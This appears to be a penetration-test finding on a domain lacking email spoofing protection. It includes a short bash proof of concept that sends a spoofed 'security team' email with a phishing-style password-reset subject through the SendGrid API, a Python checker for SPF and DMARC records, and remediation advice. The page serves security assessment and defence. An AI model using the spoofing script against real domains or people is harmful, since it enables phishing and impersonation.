Mail Server Misconfiguration - No Spoofing Protection on Email Domain
POC
Test spoofing with the following bash script
#!/bin/sh
SGUSER=""
SGPASS=""
SGTO=testemailaccount@outlook.com
SGTONAME='Test'
SGFROM=security@target.com
SGFROMNAME='Target Team'
SGSUBJECT='Major Breach - Please Login to Change Password'
SGTEXT="Good Evening,%0a%0aThis is a Spoofed Email. It could contain malicious files or links to trick your users into compromising their machines.%0a%0aBest Regards,%0a"
curl -d "to=${SGTO}&toname=${SGTONAME}&fromname=${SGFROMNAME}&subject=${SGSUBJECT}&text=${SGTEXT}&from=${SGFROM}&apiuser=${SGUSER}&apikey=${SGPASS}" https://api.sendgrid.com/api/mail.send.json
echo "\n"
python spoofcheck.py target.com
You can test whether the spoofing finding is legitimate by sending a spoofed email using SendGrid.
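The misconfiguration itself is visible in the domain's SPF and DMARC TXT records. The following is an added example, not code from the original page or from spoofcheck.py: it parses those records and reports whether receivers are told to quarantine or reject forged mail. The function names and the sample records are assumptions constructed for illustration.

```python
# Added example. TXT record strings passed in are assumed to be already fetched;
# the samples at the bottom are constructed, not lookups for a real domain.

def spf_all_qualifier(txt_records):
    """Qualifier ('+', '-', '~', '?') on the SPF 'all' mechanism, or None."""
    for rec in txt_records:
        terms = rec.lower().split()
        if not terms or terms[0] != "v=spf1":
            continue
        for term in terms[1:]:
            if term.lstrip("+-~?") == "all":
                return term[0] if term[0] in "+-~?" else "+"
    return None  # no SPF record, or no 'all' term (redirect= is not followed)

def dmarc_policy(dmarc_records):
    """(policy, pct) from the TXT record at _dmarc.<domain>, or (None, None)."""
    for rec in dmarc_records:
        tags = {}
        for part in rec.split(";"):
            key, sep, value = part.partition("=")
            if sep:
                tags[key.strip().lower()] = value.strip().lower()
        if tags.get("v") == "dmarc1":
            pct = tags.get("pct", "100")
            return tags.get("p"), int(pct) if pct.isdigit() else 100
    return None, None

def assess(txt_records, dmarc_records):
    """Return (enforced, findings); enforced = DMARC quarantines/rejects all mail."""
    findings = []
    qualifier = spf_all_qualifier(txt_records)
    if qualifier is None:
        findings.append("SPF: no record or no 'all' mechanism")
    elif qualifier in ("+", "?"):
        findings.append("SPF: permissive '%sall'" % qualifier)
    policy, pct = dmarc_policy(dmarc_records)
    if policy is None:
        findings.append("DMARC: no record or no p= tag")
    elif policy not in ("quarantine", "reject"):
        findings.append("DMARC: p=%s does not enforce" % policy)
    elif pct < 100:
        findings.append("DMARC: policy covers %d%% of mail" % pct)
    enforced = policy in ("quarantine", "reject") and pct == 100
    return enforced, findings

# Constructed sample records for a placeholder domain.
WEAK = assess(["v=spf1 include:_spf.example.net ?all"], ["v=DMARC1; p=none"])
STRONG = assess(["v=spf1 mx -all"], ["v=DMARC1; p=reject; rua=mailto:d@example.net"])
```

A domain that returns findings here should publish an SPF record ending in `-all` or `~all` and move DMARC to `p=quarantine` or `p=reject` at full coverage.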
Impact
High
Likelihood
High